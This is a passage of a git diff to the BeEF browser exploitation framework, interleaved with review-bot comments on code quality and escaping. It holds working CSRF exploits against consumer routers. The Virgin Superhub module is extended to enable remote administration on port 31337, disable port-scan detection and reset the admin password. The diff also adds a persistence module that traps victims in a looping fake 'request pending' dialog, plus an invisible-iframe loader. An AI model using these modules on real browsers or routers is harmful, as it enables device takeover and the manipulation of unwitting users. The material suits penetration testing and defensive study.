BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash') + has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') + has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears') + has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled') + date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp') + + return { + 'session' => hooked_browser.session, + 'ip' => hooked_browser.ip, + 'domain' => domain, + 'port' => hooked_browser.port.to_s, + 'browser_name' => browser_name, + 'browser_version' => browser_version, + 'browser_icon' => browser_icon, + 'os_icon' => os_icon, + 'os_name' => os_name, + 'hw_icon' => hw_icon, + 'hw_name' => hw_name, + 'has_flash' => has_flash, + 'has_web_sockets' => has_web_sockets, + 'has_googlegears' => has_googlegears, + 'has_java' => has_java, + 'date_stamp' => 
date_stamp + } + + end + end + + end end - - zombies_hash - end - - # create a hash of simple hooked browser details - def get_simple_hooked_browser_hash(hooked_browser) - - browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) - os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) - domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') - - return { - 'session' => hooked_browser.session, - 'ip' => hooked_browser.ip, - 'domain' => domain, - 'port' => hooked_browser.port.to_s, - 'browser_icon' => browser_icon, - 'os_icon' => os_icon - } - end end - -end -end -end -end diff --git a/extensions/admin_ui/media/images/icons/htc.ico b/extensions/admin_ui/media/images/icons/htc.ico new file mode 100644 index 000000000..a4b722423 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/htc.ico differ diff --git a/extensions/admin_ui/media/images/icons/ios.png b/extensions/admin_ui/media/images/icons/ios.png new file mode 100644 index 000000000..a3477139c Binary files /dev/null and b/extensions/admin_ui/media/images/icons/ios.png differ diff --git a/extensions/admin_ui/media/images/icons/iphone.jpg b/extensions/admin_ui/media/images/icons/iphone.jpg new file mode 100644 index 000000000..134b5c9f9 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/iphone.jpg differ diff --git a/extensions/admin_ui/media/images/icons/iphone.png b/extensions/admin_ui/media/images/icons/iphone.png deleted file mode 100644 index ab4a8cc31..000000000 Binary files a/extensions/admin_ui/media/images/icons/iphone.png and /dev/null differ diff --git a/extensions/admin_ui/media/images/icons/kindle.png b/extensions/admin_ui/media/images/icons/kindle.png new file mode 100644 index 000000000..b858fc003 Binary files /dev/null and b/extensions/admin_ui/media/images/icons/kindle.png differ 
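Review bot: `get_simple_hooked_browser_hash` now returns `browser_name`, `browser_version`, `os_name`, `hw_name`, `domain` and the feature flags verbatim from `BrowserDetails`, whereas `modules.rb` in this same change runs the same values through `CGI.escapeHTML` before returning them; these strings originate from the hooked browser's own POST and the client-side tree builder concatenates them into tooltip markup, so an attacker-controlled hook can inject HTML into the admin panel if the tooltip is rendered as HTML. Escape each string here as `modules.rb` does, e.g. `'hw_name' => CGI.escapeHTML(hw_name.to_s)` (the `.to_s` is needed because `BrowserDetails.get` can return `nil` and `CGI.escapeHTML(nil)` raises), and make sure `cgi` is required. Like the os.rb hunk, this one re-indents the whole file, which makes the actual additions hard to review.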
diff --git a/extensions/admin_ui/media/images/icons/motorola.png b/extensions/admin_ui/media/images/icons/motorola.png
new file mode 100644
index 000000000..fee6d6e65
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/motorola.png differ
diff --git a/extensions/admin_ui/media/images/icons/nexus.png b/extensions/admin_ui/media/images/icons/nexus.png
new file mode 100644
index 000000000..16ffc743b
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/nexus.png differ
diff --git a/extensions/admin_ui/media/images/icons/nokia.ico b/extensions/admin_ui/media/images/icons/nokia.ico
new file mode 100644
index 000000000..fe5497301
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/nokia.ico differ
diff --git a/extensions/admin_ui/media/images/icons/pc.png b/extensions/admin_ui/media/images/icons/pc.png
new file mode 100644
index 000000000..d8f38aca7
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/pc.png differ
diff --git a/extensions/admin_ui/media/images/icons/sony_ericsson.png b/extensions/admin_ui/media/images/icons/sony_ericsson.png
new file mode 100644
index 000000000..1dab4a8d2
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/sony_ericsson.png differ
diff --git a/extensions/admin_ui/media/images/icons/webos.png b/extensions/admin_ui/media/images/icons/webos.png
new file mode 100644
index 000000000..d5c0b70d7
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/webos.png differ
diff --git a/extensions/admin_ui/media/images/icons/zune.gif b/extensions/admin_ui/media/images/icons/zune.gif
new file mode 100644
index 000000000..6d8259b13
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/zune.gif differ
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index c764f94cf..347f7b97d 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js @@ -20,18 +20,49 @@ var ZombiesMgr = function(zombies_tree_lists) { // this is a helper class to create a zombie object from a JSON hash index this.zombieFactory = function(index, zombie_array){ - text = " "; - text += " "; - text += zombie_array[index]["ip"]; + + var ip = zombie_array[index]["ip"]; + var session = zombie_array[index]["session"]; + var browser_name = zombie_array[index]["browser_name"]; + var browser_version = zombie_array[index]["browser_version"]; + var browser_icon = zombie_array[index]["browser_icon"]; + var os_icon = zombie_array[index]["os_icon"]; + var os_name = zombie_array[index]["os_name"]; + var hw_name = zombie_array[index]["hw_name"]; + var hw_icon = zombie_array[index]["hw_icon"]; + var domain = zombie_array[index]["domain"]; + var port = zombie_array[index]["port"]; + var has_flash = zombie_array[index]["has_flash"]; + var has_web_sockets = zombie_array[index]["has_web_sockets"]; + var has_googlegears = zombie_array[index]["has_googlegears"]; + var has_java = zombie_array[index]["has_java"]; + var date_stamp = zombie_array[index]["date_stamp"]; + + text = " "; + text+= " "; + text+= " "; + text+= ip; + + balloon_text = "IP: " + ip; + balloon_text+= "
Browser: " + browser_name + " " + browser_version; + balloon_text+= "
System: " + os_name; + balloon_text+= "
Hardware: " + hw_name; + balloon_text+= "
Domain: " + domain + ":" + port; + balloon_text+= "
Flash: " + has_flash; + balloon_text+= "
Java: " + has_java; + balloon_text+= "
Web Sockets: " + has_web_sockets; + balloon_text+= "
Google Gears: " + has_googlegears; + balloon_text+= "
Date: " + date_stamp; var new_zombie = { - 'id' : index, - 'ip' : zombie_array[index]["ip"], - 'session' : zombie_array[index]["session"], - 'text': text, - 'check' : false, - 'domain' : zombie_array[index]["domain"], - 'port' : zombie_array[index]["port"] + 'id' : index, + 'ip' : ip, + 'session' : session, + 'text' : text, + 'balloon_text' : balloon_text, + 'check' : false, + 'domain' : domain, + 'port' : port }; return new_zombie; diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js index 247a44fe9..aa04f300f 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js +++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js @@ -196,7 +196,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { var exists = this.getNodeById(hb_id); if(exists) return; - hooked_browser.qtip = hooked_browser.text + ' hooked on ' + hooked_browser.domain + ":" + hooked_browser.port; + hooked_browser.qtip = hooked_browser.balloon_text; //save a new online HB if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) { @@ -220,7 +220,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { //creates a new node for that hooked browser node = new Ext.tree.TreeNode(hooked_browser); - + //creates a sub-branch for that HB if necessary mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox); diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index a896184cb..f810c042e 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb 
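Review bot: The fields concatenated into `balloon_text` in zombieFactory (browser_name, browser_version, os_name, hw_name, domain, port, date_stamp) are inserted as raw text, and in the zombiesTreeList.js hunk on the same line that string is assigned to `hooked_browser.qtip`, which Ext QuickTips appears to render as HTML; since these values presumably originate from the hooked browser's own report, a browser that reports markup in, say, its hardware or browser name could inject HTML or script into the operator's admin UI. Each field should be HTML-encoded before concatenation, e.g. `var hw_name = Ext.util.Format.htmlEncode(zombie_array[index]["hw_name"]);` for every value that ends up in `text` or `balloon_text`. Separately, `text` and `balloon_text` are assigned without `var` and so become implicit globals (the pre-existing `text = " "` had the same issue); `var text = " ";` and `var balloon_text = "IP: " + ip;` keep them local. The `<br>` separators seem to have been lost in this page's rendering, and zombieFactory's closing line lies outside the hunk.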
@@ -358,6 +358,21 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the return values for the os name + hw_name = BD.get(self.targetsession, 'Hardware') + if not hw_name.nil? + encoded_hw_name = CGI.escapeHTML(hw_name) + encoded_hw_name_hash = { 'Hardware' => encoded_hw_name } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_hw_name_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the return values for the browser name browser_name = BD.get(self.targetsession, 'BrowserName') if not browser_name.nil? @@ -535,6 +550,21 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the yes|no value for HasPhonegap + has_phonegap = BD.get(self.targetsession, 'HasPhonegap') + if not has_phonegap.nil? + encoded_has_phonegap = CGI.escapeHTML(has_phonegap) + encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap } + + page_name_row = { + 'category' => 'Browser', + 'data' => encoded_has_phonegap_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the yes|no value for HasGoogleGears has_googlegears = BD.get(self.targetsession, 'HasGoogleGears') if not has_googlegears.nil? diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml index b4a20fe33..3aa49f32f 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml @@ -24,7 +24,7 @@ beef: target: working: S: - os: ["iPhone"] + os: ["iOS"] not_working: ALL: os: ["All"] diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js index fdbedec46..d713b6b06 100644 
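Review bot: The comment introducing the new block in the first hunk reads `# set and add the return values for the os name`, but the block reads the `'Hardware'` key, so it should read `# set and add the return values for the hardware name`. As a matter of style, both new blocks (this one and the HasPhonegap block in the second hunk) use `if not hw_name.nil?` / `if not has_phonegap.nil?`, where Ruby idiom is `unless hw_name.nil?` / `unless has_phonegap.nil?`. The two blocks also repeat, line for line, a pattern that the surrounding context shows is copied for every datastore key; a private helper taking the BD key, the row label and the category would replace each copy with a single call. The enclosing method starts and ends outside both hunks.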
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js @@ -18,12 +18,12 @@ beef.execute(function() { var passwd = '<%= @password %>'; var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2 = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); - form.setAttribute('action', gateway + "/password.cgi"); + form.setAttribute('action', gateway + "password.cgi"); form.setAttribute('method', 'post'); var input = null; diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js index b6cc7ab28..afe248983 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js @@ -18,7 +18,7 @@ beef.execute(function() { var passwd = '<%= @password %>'; var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2 = beef.dom.createInvisibleIframe(); ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js index ae1c98e23..f25c89a5b 100644 
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js +++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js @@ -17,7 +17,7 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST", + var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js index a749117a8..bfe98e957 100644 --- a/modules/exploits/router/huawei_smartax_mt880/command.js +++ b/modules/exploits/router/huawei_smartax_mt880/command.js @@ -19,7 +19,7 @@ beef.execute(function() { var passwd = '<%= @password %>'; var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe(); - huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); + huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js index 5acb91421..fb0ed4ca4 100644 --- a/modules/exploits/router/virgin_superhub_csrf/command.js +++ b/modules/exploits/router/virgin_superhub_csrf/command.js 
@@ -17,17 +17,29 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; + var port = '<%= @port %>'; - var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [ - {'type':'hidden', 'name':'NetgearPassword', 'value':passwd} , + var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ + {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} ]); + var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ + {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} + ]); + + var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ + {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, + {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} + ]); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(virgin_superhub_iframe); + document.body.removeChild(virgin_superhub_iframe1); + document.body.removeChild(virgin_superhub_iframe2); + document.body.removeChild(virgin_superhub_iframe3); } setTimeout("cleanup()", 15000); diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml index 11c11a548..e767d9fef 100644 --- a/modules/exploits/router/virgin_superhub_csrf/config.yaml +++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml 
@@ -19,7 +19,7 @@ beef: enable: true category: ["Exploits", "Router"] name: "Virgin Superhub CSRF" - description: "Attempts to change the admin password on a Virgin Superhub router." - authors: ["bcoles"] + description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router." + authors: ["bcoles", "n0x00"] target: working: ["ALL"] diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb index 8a2e5a2d1..83599490c 100644 --- a/modules/exploits/router/virgin_superhub_csrf/module.rb +++ b/modules/exploits/router/virgin_superhub_csrf/module.rb @@ -17,8 +17,9 @@ class Virgin_superhub_csrf < BeEF::Core::Command def self.options return [ - {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'}, - {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}, + {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'} ] end diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml index 4a0d23f18..ba611bf45 100644 --- a/modules/host/detect_google_desktop/config.yaml +++ b/modules/host/detect_google_desktop/config.yaml @@ -24,5 +24,5 @@ beef: target: not_working: ALL: - os: ["iPhone"] + os: ["iOS"] working: ["ALL"] diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml index 802db1695..7902a2381 100644 --- a/modules/host/get_system_info/config.yaml +++ b/modules/host/get_system_info/config.yaml @@ -24,6 +24,6 @@ beef: target: not_working: ALL: - os: ["iPhone", "Macintosh"] + os: ["iOS", "Macintosh"] working: ["O", "FF", "S", "IE"] user_notify: ["C"] 
diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml
index 0033717ba..56c276653 100644
--- a/modules/host/hook_default_browser/config.yaml
+++ b/modules/host/hook_default_browser/config.yaml
@@ -24,6 +24,6 @@ beef:
 target:
 not_working:
 ALL:
- os: ["iPhone"]
+ os: ["iOS"]
 working: ["All"]
 user_notify: ["FF", "C"]
diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml
index d3bb15769..783637ed4 100644
--- a/modules/host/iphone_tel/config.yaml
+++ b/modules/host/iphone_tel/config.yaml
@@ -24,7 +24,7 @@ beef:
 target:
 user_notify:
 S:
- os: ["iPhone"]
+ os: ["iOS"]
 not_working:
 ALL:
 os: ["All"]
diff --git a/modules/misc/invisible_iframe/command.js b/modules/misc/invisible_iframe/command.js
new file mode 100644
index 000000000..a0763583c
--- /dev/null
+++ b/modules/misc/invisible_iframe/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var target = "<%= @target %>";
+ var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+ iframe_<%= @command_id %>.setAttribute('src', target);
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=IFrame created');
+
+});
diff --git a/modules/misc/invisible_iframe/config.yaml b/modules/misc/invisible_iframe/config.yaml
new file mode 100644
index 000000000..b391c048a
--- /dev/null
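Review bot: In the new invisible_iframe command.js the option value is templated unescaped into a double-quoted JS string literal, `var target = "<%= @target %>";`, so a `"` or backslash in the operator-entered URL would produce a syntax error in the generated script and the module would silently do nothing. The other command.js files in this diff use single quotes for the same pattern (`'<%= @base %>'`), which does not fix the problem but is at least consistent; the robust approach is to validate the value as a URL in the module's Ruby side before it reaches the template, or to JSON-encode it there and emit `var target = <%= encoded_target %>;`. The result string `'result=IFrame created'` matches what the module.rb in the next hunk saves, which is good.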
+++ b/modules/misc/invisible_iframe/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ invisible_iframe:
+ enable: true
+ category: "Misc"
+ name: "Create Invisible Iframe"
+ description: "Creates an invisible iframe."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb
new file mode 100644
index 000000000..1bfb45b60
--- /dev/null
+++ b/modules/misc/invisible_iframe/module.rb
@@ -0,0 +1,28 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Invisible_iframe < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'target', 'ui_label' => 'URL', 'value' => 'http://beefproject.com/'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
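Review bot: `self.options` in the new module.rb uses an explicit `return` on a bare array literal; Ruby returns the last expression, so `return [` / `]` can simply be `[` / `]`, and `save({'result' => @datastore['result']})` can drop the braces as `save('result' => @datastore['result'])`. Neither the module nor the YAML documents what the `target` option accepts, and since command.js interpolates it straight into a script string, a one-line YARD note on `self.options` such as `# @return [Array<Hash>] the 'target' option, expected to be a URL the hooked page can load in an iframe` would tell the next maintainer where validation belongs. The same `return [` style appears in the virgin_superhub module.rb hunk above.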
diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml index 4c44194e1..d6b2c0be4 100644 --- a/modules/misc/local_file_theft/config.yaml +++ b/modules/misc/local_file_theft/config.yaml @@ -23,7 +23,7 @@ beef: enable: true category: "Misc" name: "Local File Theft" - description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system." + description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.
This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system." authors: ["mh"] target: - working: ["All"] + working: ["S"] diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js new file mode 100644 index 000000000..1609bcab7 --- /dev/null +++ b/modules/persistence/confirm_close_tab/command.js 
@@ -0,0 +1,45 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ function display_confirm(){
+ if(confirm("Are you sure you want to navigate away from this page?\n\n There is currently a request to the server pending. You will lose recent changes by navigating away.\n\n Press OK to continue, or Cancel to stay on the current page.")){
+ display_confirm();
+ }
+ }
+
+ function dontleave(e){
+ e = e || window.event;
+
+ if(beef.browser.isIE()){
+ e.cancelBubble = true;
+ e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";
+ }else{
+ if (e.stopPropagation) {
+ e.stopPropagation();
+ e.preventDefault();
+ }
+ }
+
+ //re-display the confirm dialog if the user clicks OK (to leave the page)
+ display_confirm();
+ return "There is currently a request to the server pending. You will lose recent changes by navigating away.";
+ }
+
+ window.onbeforeunload = dontleave;
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Module executed successfully');
+});
diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml
new file mode 100644
index 000000000..62bcd36e6
--- /dev/null
+++ b/modules/persistence/confirm_close_tab/config.yaml
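Review bot: The result sent on the last line of the hunk, `'Module executed successfully'`, carries no `result=` key, yet the module's `post_execute` in the module.rb hunk below saves `@datastore['result']`; the sibling invisible_iframe module sends `'result=IFrame created'`, so this one presumably stores nil — `'result=Module executed successfully'` would match the convention. The warning text is also duplicated verbatim in `e.returnValue` and in the `return` of `dontleave`; a single `var msg = "There is currently a request to the server pending. You will lose recent changes by navigating away.";` used in both places keeps them in sync. `display_confirm` re-enters itself for every OK click, so the stack grows with each repetition; `while(confirm("...")) {}` expresses the same loop without recursion. The `setAttribute`-style helpers are not involved here, but `beef.browser.isIE()` is assumed to exist in the client core, which is outside this diff.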
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ confirm_close_tab:
+ enable: true
+ category: "Persistence"
+ name: "Confirm Close Tab"
+ description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12"
+ authors: ["antisnatchor"]
+ target:
+ user_notify: ["ALL"]
+ not_working: ["O"]
\ No newline at end of file
diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb
new file mode 100644
index 000000000..e38abbfd5
--- /dev/null
+++ b/modules/persistence/confirm_close_tab/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Confirm_close_tab < BeEF::Core::Command
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end